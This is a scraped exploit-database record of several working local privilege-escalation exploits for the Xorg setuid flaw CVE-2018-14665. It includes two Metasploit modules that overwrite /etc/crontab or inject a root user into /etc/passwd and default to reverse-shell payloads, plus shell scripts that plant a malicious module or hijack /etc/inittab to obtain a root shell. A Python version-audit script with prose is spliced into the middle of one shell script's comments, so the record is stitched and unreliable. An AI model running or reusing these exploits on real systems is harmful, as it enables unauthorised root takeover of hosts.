\nvprint_error 'Selinux is enforcing' \nreturn CheckCode::Safe \nend \nend \nvprint_good \"Selinux is not an issue\" \nend \n \n# suid program check \nxorg_path = cmd_exec \"command -v Xorg\" \nunless xorg_path.include?(\"Xorg\") \nvprint_error \"Could not find Xorg executable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg path found at #{xorg_path}\" \nunless setuid? xorg_path \nvprint_error \"Xorg binary #{xorg_path} is not SUID\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg binary #{xorg_path} is SUID\" \n \n# version check \nx_version = cmd_exec \"Xorg -version\" \nif x_version.include?(\"Release Date\") \nv = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first) \nunless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2')) \nvprint_error \"Xorg version #{v} not supported\" \nreturn CheckCode::Safe \nend \nelsif x_version.include?(\"Fatal server error\") \nvprint_error \"User probably does not have console auth\" \nvprint_error \"Below is Xorg -version output\" \nvprint_error x_version \nreturn CheckCode::Safe \nelse \nvprint_warning \"Could not parse Xorg -version output\" \nreturn CheckCode::Appears \nend \nvprint_good \"Xorg version #{v} is vulnerable\" \n \n# process check for /X \nproc_list = cmd_exec \"ps ax\" \nif proc_list.include?('/X ') \nvprint_warning('Xorg in process list') \nreturn CheckCode::Appears \nend \nvprint_good('Xorg does not appear running') \nreturn CheckCode::Vulnerable \nend \n \ndef on_new_session(session) \nif session.type.to_s.eql? 'meterpreter' \nsession.core.use 'stdapi' unless session.ext.aliases.include? 
'stdapi' \nsession.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\" \nelse \nsession.shell_command(@clean_up) \nend \nprint_good \"Returning session after cleaning\" \nensure \nsuper \nend \n \ndef exploit \n \ncheck_status = check \nif check_status == CheckCode::Appears \nprint_warning 'Could not get version or Xorg process possibly running, may fail' \nelsif check_status == CheckCode::Safe \nfail_with Failure::NotVulnerable, 'Target not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'This session already has root privileges' \nend \n \nunless writable? datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \nprint_good 'Passed all initial checks for exploit' \n \npscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\" \n@clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\" \nxdisplay = datastore['Xdisplay'] \n \n# Uploading file crontab will run \nprint_status 'Uploading your payload, this could take a while' \nif payload.arch.first == 'cmd' \nwrite_file(pscript, payload.encoded) \nelse \nwrite_file(pscript, generate_payload_exe) \nend \nregister_file_for_cleanup pscript \nchmod pscript \n \n# Exploit steps on crontab so backing it up \ncmd_exec \"cat /etc/crontab > #{pscript}.b\" \n# Actual exploit with cron overwrite \nprint_status 'Trying /etc/crontab overwrite' \ncmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\" \nRex.sleep 5 \ncmd_exec \"pkill Xorg\" \nRex.sleep 1 \ncron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\" \nunless cron_check.include? pscript \nrm_f \"#{pscript}.b\" \nprint_error 'Deleting crontab backup' \nfail_with Failure::NotVulnerable, '/etc/crontab not modified' \nend \nprint_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...' 
\nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150450/xorg_x11_suid_server.rb.txt"}, {"lastseen": "2019-11-14T02:21:27", "description": "", "published": "2019-11-12T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-11-12T00:00:00", "id": "PACKETSTORM:155276", "href": "https://packetstormsecurity.com/files/155276/Xorg-X11-Server-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Xorg X11 Server Local Privilege Escalation', \n'Description' => %q( \nWARNING: Successful execution of this module results in /etc/passwd being overwritten. \n \nThis module is a port of the OpenBSD X11 Xorg exploit to run on AIX. \n \nA permission check flaw exists for -modulepath and -logfile options when \nstarting Xorg. This allows unprivileged users that can start the server \nthe ability to elevate privileges and run arbitrary code under root \nprivileges. \n \nThis module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. \nDue to permission restrictions of the crontab in AIX, this module does not use cron, \nand instead overwrites /etc/passwd in order to create a new user with root privileges. \nAll currently logged in users need to be included when /etc/passwd is overwritten, \nelse AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. 
\nThe Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, \nand is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when \noverwriting /etc/passwd. \n), \n'Author' => \n[ \n'Narendra Shinde', # Discovery and original FreeBSD exploit \n'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => 'Oct 25 2018', \n'Notes' => \n{ \n'SideEffects' => [ CONFIG_CHANGES ] \n}, \n'References' => \n[ \n['CVE', '2018-14665'], \n['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'], \n['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'], \n['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'], \n['EDB', '45938'] \n], \n'Platform' => ['unix'], \n'Arch' => [ARCH_CMD], \n'SessionTypes' => ['shell'], \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'perl' \n} \n}, \n'DefaultOptions' => { \n'Payload' => 'cmd/unix/reverse_perl' \n}, \n'Targets' => \n[ \n['IBM AIX Version 6.1', {}], \n['IBM AIX Version 7.1', {}], \n['IBM AIX Version 7.2', {}] \n], \n'DefaultTarget' => 1)) \n \nregister_options( \n[ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \n) \nend \n \ndef check \nxorg_path = cmd_exec('command -v Xorg') \nif !xorg_path.include?('Xorg') \nprint_error('Could not find Xorg executable') \nreturn Exploit::CheckCode::Safe \nend \n \nksh93_path = cmd_exec('command -v ksh93') \nif !ksh93_path.include?('ksh') \nprint_error('Could not find Ksh93 executable') \nreturn Exploit::CheckCode::Safe \nend \n \nif !xorg_vulnerable?
\nprint_error('Xorg version is not vulnerable') \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Appears \nend \n \ndef exploit \nstatus = check \n \nif status == Exploit::CheckCode::Safe \nfail_with(Failure::NotVulnerable, '') \nend \n \nif !writable?(datastore['WritableDir']) \nfail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\") \nend \n \nxorg_path = cmd_exec('command -v Xorg') \nksh93_path = cmd_exec('command -v ksh93') \n \nxorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir']) \nxorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\" \nupload_and_chmodx(xorg_script_path, xorg_payload) \n \npasswd_backup = \"#{datastore['WritableDir']}/passwd.backup\" \nprint_status(\"Backing up /etc/passwd to #{passwd_backup}\") \ncmd_exec(\"cp /etc/passwd #{passwd_backup}\") \nregister_file_for_cleanup(passwd_backup) \n \nprint_status(\"Executing #{xorg_script_path}\") \ncmd_exec(xorg_script_path) \nprint_status('Checking if we are root') \n \nif root? \nshell_payload = %(#!#{ksh93_path} \n#{payload.encoded} \n) \nshell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\" \nupload_and_chmodx(shell_script_path, shell_payload) \n \nprint_status('Executing shell payload') \ncmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\") \n \nprint_status('Restoring original /etc/passwd') \ncmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\") \nelse \nfail_with(Failure::PayloadFailed, '') \nend \nend \n \ndef generate_xorg_payload(xorg_path, ksh93_path, writabledir) \npasswd_file = read_file('/etc/passwd') \npasswd_array = passwd_file.split(\"\\n\") \n \nprint_status('Retrieving currently logged in users') \nusers = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq') \nusers << \"\\n\" \nusers_array = users.split(\"\\n\") \n \nlogged_in_users = '' \nif !users_array.empty? 
\nusers_array.each do |user| \nuser << ':' \npasswd_array.each do |line| \nif line.index(user) == 0 \nlogged_in_users << '\\n' \nlogged_in_users << line \nend \nend \nend \nend \n \npasswd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\" \n \nsubdir_count = writabledir.count('/') \nrelative_passwd = '../' * subdir_count + '../../etc/passwd' \n \nreturn %(#!#{ksh93_path} \n#{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1 \n) \nend \n \ndef xorg_vulnerable? \nversion = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'') \nprint_status(\"Xorg version is #{version}\") \nsemantic_version = Gem::Version.new(version) \n \nvulnerable_versions = [ \n['6.1.9.0', '6.1.9.100'], \n['7.1.4.0', '7.1.4.30'], \n['7.1.5.0', '7.1.5.31'], \n['7.2.0.0', '7.2.0.1'], \n['7.2.1.0', '7.2.1.0'], \n['7.2.2.0', '7.2.2.0'], \n['7.2.3.0', '7.2.3.15'] \n] \n \nvulnerable_versions.each do |version_pair| \nif semantic_version >= Gem::Version.new(version_pair[0]) && \nsemantic_version <= Gem::Version.new(version_pair[1]) \nreturn true \nend \nend \n \nreturn false \nend \n \ndef root? 
\nid_output = cmd_exec('su - wow -c \"id\"') \n \nif id_output.include?('euid=0') || id_output.include?('uid=0') \nprint_good('Got root!') \nreturn true \nend \n \nprint_error('Not root') \nfalse \nend \n \ndef upload_and_chmodx(path, data) \nprint_status(\"Writing to #{path}\") \nrm_f(path) \nwrite_file(path, data) \ncmd_exec(\"chmod 0555 '#{path}'\") \n \nregister_file_for_cleanup(path) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155276/xorg_x11_server.rb.txt"}, {"lastseen": "2018-12-01T18:27:26", "description": "", "published": "2018-12-01T00:00:00", "type": "packetstorm", "title": "xorg-x11-server modulepath Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0745", "CVE-2018-14665"], "modified": "2018-12-01T00:00:00", "id": "PACKETSTORM:150554", "href": "https://packetstormsecurity.com/files/150554/xorg-x11-server-modulepath-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n \n# \n# raptor_xorgy - xorg-x11-server LPE via modulepath switch \n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665). \n# \n# This exploit variant triggers the bug in the -modulepath command line switch \n# to load a malicious X11 module in order to escalate privileges to root on \n# vulnerable systems. This technique is less invasive than exploiting the \n# -logfile switch, however the gcc compiler must be present in order for it to \n# work out of the box. Alternatively, you must use a pre-compiled malicious .so \n# compatible with the target system and modify the exploit accordingly. 
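Before any of the archived modules or scripts on this page are pointed at a host, a practitioner wants a non-destructive precondition check, since every variant here needs a setuid Xorg in the 1.19.0 to 1.20.2 window (or one of the AIX fileset ranges) and, on RHEL/CentOS, a console lock for the calling user. The block below is an added example and is not code from any of the exploits or Metasploit modules on this page. It reproduces the decision logic of the Linux/OpenBSD module's `check` (setuid bit, version window, console lock, SELinux) and the AIX module's `xorg_vulnerable?` table offline on constructed input; `SAMPLE_VERSION_OUTPUT` and the mode bits are constructed, and `audit_local()` assumes the pam_console lock path `/var/run/console/<user>` and the SELinux flag at `/sys/fs/selinux/enforce`.

```python
import getpass
import os
import platform
import re
import shutil
import stat
import subprocess

# Version window the exploits on this page quote: setuid Xorg 1.19.0 - 1.20.2.
UPSTREAM_VULN = ((1, 19, 0), (1, 20, 2))

# AIX X11.base.rte fileset ranges, copied from the AIX module's xorg_vulnerable? table.
AIX_VULN = [
    ("6.1.9.0", "6.1.9.100"), ("7.1.4.0", "7.1.4.30"), ("7.1.5.0", "7.1.5.31"),
    ("7.2.0.0", "7.2.0.1"), ("7.2.1.0", "7.2.1.0"), ("7.2.2.0", "7.2.2.0"),
    ("7.2.3.0", "7.2.3.15"),
]

# Constructed sample of `Xorg -version` output (Xorg prints it on stderr).
SAMPLE_VERSION_OUTPUT = """\
X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Current Operating System: Linux host 3.10.0-862.el7.x86_64 #1 SMP x86_64
"""


def parse_version(text):
    """'1.19.5' -> (1, 19, 5); tuples of ints compare component-wise."""
    return tuple(int(p) for p in text.strip().split("."))


def version_from_output(output):
    """Server version from `Xorg -version` output, or None.

    The Metasploit module takes the first three-part number anywhere in the
    output; anchoring on the banner line avoids mistaking a kernel version for it.
    """
    m = re.search(r"^X\.Org X Server (\d+\.\d+\.\d+)", output, re.MULTILINE)
    return m.group(1) if m else None


def upstream_vulnerable(version):
    lo, hi = UPSTREAM_VULN
    return lo <= parse_version(version) <= hi


def aix_vulnerable(fileset_version):
    v = parse_version(fileset_version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AIX_VULN)


def assess(version_output, st_mode, console_lock=True, selinux_enforcing=False):
    """Return (verdict, reason) with the module's Safe/Appears/Vulnerable semantics.

    A non-setuid Xorg is safe whatever its version: the flawed permission
    check only matters when Xorg runs setuid root, which every exploit here requires.
    """
    if not st_mode & stat.S_ISUID:
        return "safe", "Xorg is not setuid"
    if not console_lock:
        return "safe", "no /var/run/console lock: console auth would stop Xorg (module bails)"
    if selinux_enforcing:
        return "safe", "SELinux enforcing: module bails, payload might still run confined"
    if "Fatal server error" in version_output:
        return "safe", "Xorg -version failed; user probably lacks console auth"
    version = version_from_output(version_output)
    if version is None:
        return "appears", "could not parse Xorg -version output"
    if not upstream_vulnerable(version):
        return "safe", "Xorg %s is outside 1.19.0-1.20.2" % version
    return "vulnerable", "setuid Xorg %s with usable console" % version


def audit_local():
    """Same checks against the live host; returns None when Xorg is absent.

    Assumed locations: pam_console lock files under /var/run/console/<user>
    and the SELinux enforce flag at /sys/fs/selinux/enforce.
    """
    xorg = shutil.which("Xorg")
    if xorg is None:
        return None
    mode = os.stat(xorg).st_mode
    try:
        run = subprocess.run([xorg, "-version"], capture_output=True, text=True, timeout=10)
        output = run.stdout + run.stderr
    except (OSError, subprocess.TimeoutExpired):
        output = ""
    # the module only applies the console-lock test on Linux
    lock = platform.system() != "Linux" or os.path.exists(
        "/var/run/console/%s" % getpass.getuser())
    enforcing = False
    try:
        with open("/sys/fs/selinux/enforce") as f:
            enforcing = f.read().strip() == "1"
    except OSError:
        pass
    return assess(output, mode, console_lock=lock, selinux_enforcing=enforcing)


if __name__ == "__main__":
    print(assess(SAMPLE_VERSION_OUTPUT, 0o104755))  # constructed: setuid Xorg 1.19.5
    print(audit_local())
```

The verdicts follow the module's CheckCode, not an independent judgement: the SELinux and console-lock results mean "the published exploit would bail here", which the module itself notes is not the same as "not exploitable". The only durable fix the assessment reflects is the first test, a non-setuid Xorg, which is what patched packages and the distro wrappers change.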
\n# \n# It works very reliably on Solaris 11.4 and should work on most vulnerable \n# Linux distributions (though I haven't tested it). For some reason, it fails to \n# obtain uid 0 on OpenBSD... They might have an additional protection in place. \n# \n# Thanks to @alanc and @nushinde for discussing this alternative vector. \n# \n# See also: \n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm \n# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm \n# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html \n# https://nvd.nist.gov/vuln/detail/CVE-2006-0745 \n# \n# Usage: \n# raptor@stalker:~$ chmod +x raptor_xorgy \n# raptor@stalker:~$ ./raptor_xorgy \n# [...] \n# root@stalker:~# id \n# uid=0(root) gid=0(root) \n# \n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): \n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] \n# Oracle Solaris 11 SPARC [untested] \n# CentOS Linux 7 [untested, it should work] \n# Red Hat Enterprise Linux 7 [untested] \n# Ubuntu Linux 18.10 [untested] \n# Ubuntu Linux 18.04 LTS [untested] \n# Ubuntu Linux 16.04 LTS [untested] \n# Debian GNU/Linux 9 [untested] \n# [...] \n# \n \necho \"raptor_xorgy - xorg-x11-server LPE via modulepath switch\" \necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\" \necho \n \n# prepare the payload \ncat << EOF > /tmp/pwned.c \n_init() \n{ \nsetuid(0); \nsetgid(0); \nsystem(\"/bin/bash\"); \n} \nEOF \n# libglx.so should be a good target, refer to Xorg logs for other candidates \ngcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so \nif [ $? 
-ne 0 ]; then echo; echo \"error: cannot compile /tmp/pwned.c\"; exit; fi \n \n# trigger the bug \necho \"Got root?\" \nXorg -modulepath \",/tmp\" :1 \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150554/xorgx11modulepath-escalate.txt"}], "exploitdb": [{"lastseen": "2019-01-14T16:58:03", "description": "", "published": "2019-01-14T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "EDB-ID:46142", "href": "https://www.exploit-db.com/exploits/46142", "sourceData": "#!/bin/sh\r\n\r\n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)\r\n# Date: 2018-11-25\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: Oracle Solaris 11.4\r\n# CVE : CVE-2018-14665\r\n\r\n#\r\n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab\r\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# \"In video games, this is what they call respawning\" -- Nick Sax\r\n#\r\n# This exploit targets /etc/inittab in order to escalate privileges to root\r\n# on Solaris 11 (no need to be connected to a physical console). Messing with \r\n# inittab is considerably dangerous and you may trash your system, however the\r\n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \r\n# work or are even worse. 
Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!\r\n#\r\n# See also:\r\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\r\n#\r\n# Usage:\r\n# raptor@stalker:~$ chmod +x raptor_solgasm\r\n# raptor@stalker:~$ ./raptor_solgasm\r\n# [...]\r\n# Now please be patient for a few minutes...\r\n# [...]\r\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab\r\n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab\r\n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old\r\n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned\r\n# root@stalker:/etc# id\r\n# uid=0(root) gid=0(root)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\r\n# Oracle Solaris 11 SPARC [untested]\r\n#\r\n\r\necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/solgasm\r\ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /tmp/pwned\r\nchmod 4777 /tmp/pwned\r\nEOF\r\nchmod +x /tmp/solgasm\r\n\r\n# trigger the bug\r\nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)\r\ncd /etc\r\nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 &\r\nsleep 5\r\npkill Xorg\r\n\r\n# run the setuid shell\r\necho\r\necho \"Now please be patient for a few minutes...\"\r\necho\r\nuntil [ -u /tmp/pwned ]; do sleep 1; done\r\necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\"\r\nls -l /etc/inittab*\r\nls -l /tmp/pwned\r\nsleep 1\r\n/tmp/pwned", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46142"}, {"lastseen": "2018-11-30T12:30:58", "description": "", "published": "2018-11-26T00:00:00", "type": "exploitdb", "title": 
"Xorg X11 Server - SUID privilege escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-26T00:00:00", "id": "EDB-ID:45908", "href": "https://www.exploit-db.com/exploits/45908", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::Kernel\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server SUID privilege escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges with SUID Xorg X11 server\r\n versions 1.19.0 < 1.20.3.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).\r\n CentOS default install will require console auth for the users session.\r\n Cron launches the payload so if Selinux is enforcing exploitation\r\n may still be possible, but the module will bail.\r\n Xorg must have SUID permissions and may not start if running.\r\n\r\n On exploitation a crontab.old backup file will be created by Xorg.\r\n This module will remove the .old file and restore crontab after\r\n successful exploitation. Failed exploitation may result in a corrupted\r\n crontab. 
On successful exploitation artifacts will be created consistent\r\n with starting Xorg and running a cron.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and exploit\r\n 'Raptor - 0xdea', # Modified exploit for cron\r\n 'Aaron Ringo', # Metasploit module\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2018-14665' ],\r\n [ 'BID', '105741' ],\r\n [ 'EDB', '45697' ],\r\n [ 'EDB', '45742' ],\r\n [ 'EDB', '45832' ],\r\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],\r\n [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]\r\n ],\r\n 'Platform' => %w[openbsd linux],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => %w[shell meterpreter],\r\n 'Targets' =>\r\n [\r\n ['OpenBSD', {\r\n 'Platform' => 'unix',\r\n 'Arch' => [ ARCH_CMD ] } ],\r\n ['Linux x64', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X64 ] } ],\r\n ['Linux x86', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X86 ] } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'cmd/unix/reverse_openssl',\r\n 'WfsDelay' => 120\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\r\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])\r\n ]\r\n )\r\n end\r\n\r\n\r\n def check\r\n\r\n # linux checks\r\n uname = cmd_exec \"uname\"\r\n if uname =~ /linux/i\r\n vprint_status \"Running additional check for Linux\"\r\n if datastore['ConsoleLock']\r\n user = cmd_exec \"id -un\"\r\n unless exist?
\"/var/run/console/#{user}\"\r\n vprint_error \"No console lock for #{user}\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Console lock for #{user}\"\r\n end\r\n if selinux_installed?\r\n if selinux_enforcing?\r\n vprint_error 'Selinux is enforcing'\r\n return CheckCode::Safe\r\n end\r\n end\r\n vprint_good \"Selinux is not an issue\"\r\n end\r\n\r\n # suid program check\r\n xorg_path = cmd_exec \"command -v Xorg\"\r\n unless xorg_path.include?(\"Xorg\")\r\n vprint_error \"Could not find Xorg executable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg path found at #{xorg_path}\"\r\n unless setuid? xorg_path\r\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\r\n\r\n # version check\r\n x_version = cmd_exec \"Xorg -version\"\r\n if x_version.include?(\"Release Date\")\r\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\r\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\r\n vprint_error \"Xorg version #{v} not supported\"\r\n return CheckCode::Safe\r\n end\r\n elsif x_version.include?(\"Fatal server error\")\r\n vprint_error \"User probably does not have console auth\"\r\n vprint_error \"Below is Xorg -version output\"\r\n vprint_error x_version\r\n return CheckCode::Safe\r\n else\r\n vprint_warning \"Could not parse Xorg -version output\"\r\n return CheckCode::Appears\r\n end\r\n vprint_good \"Xorg version #{v} is vulnerable\"\r\n\r\n # process check for /X\r\n proc_list = cmd_exec \"ps ax\"\r\n if proc_list.include?('/X ')\r\n vprint_warning('Xorg in process list')\r\n return CheckCode::Appears\r\n end\r\n vprint_good('Xorg does not appear running')\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 
'stdapi'\r\n session.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\"\r\n else\r\n session.shell_command(@clean_up)\r\n end\r\n print_good \"Returning session after cleaning\"\r\n ensure\r\n super\r\n end\r\n\r\n def exploit\r\n\r\n check_status = check\r\n if check_status == CheckCode::Appears\r\n print_warning 'Could not get version or Xorg process possibly running, may fail'\r\n elsif check_status == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'This session already has root privileges'\r\n end\r\n\r\n unless writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n print_good 'Passed all initial checks for exploit'\r\n\r\n pscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\"\r\n @clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\"\r\n xdisplay = datastore['Xdisplay']\r\n\r\n # Uploading file crontab will run\r\n print_status 'Uploading your payload, this could take a while'\r\n if payload.arch.first == 'cmd'\r\n write_file(pscript, payload.encoded)\r\n else\r\n write_file(pscript, generate_payload_exe)\r\n end\r\n register_file_for_cleanup pscript\r\n chmod pscript\r\n\r\n # Exploit steps on crontab so backing it up\r\n cmd_exec \"cat /etc/crontab > #{pscript}.b\"\r\n # Actual exploit with cron overwrite\r\n print_status 'Trying /etc/crontab overwrite'\r\n cmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\"\r\n Rex.sleep 5\r\n cmd_exec \"pkill Xorg\"\r\n Rex.sleep 1\r\n cron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\"\r\n unless cron_check.include? pscript\r\n rm_f \"#{pscript}.b\"\r\n print_error 'Deleting crontab backup'\r\n fail_with Failure::NotVulnerable, '/etc/crontab not modified'\r\n end\r\n print_good '/etc/crontab overwrite successful. 
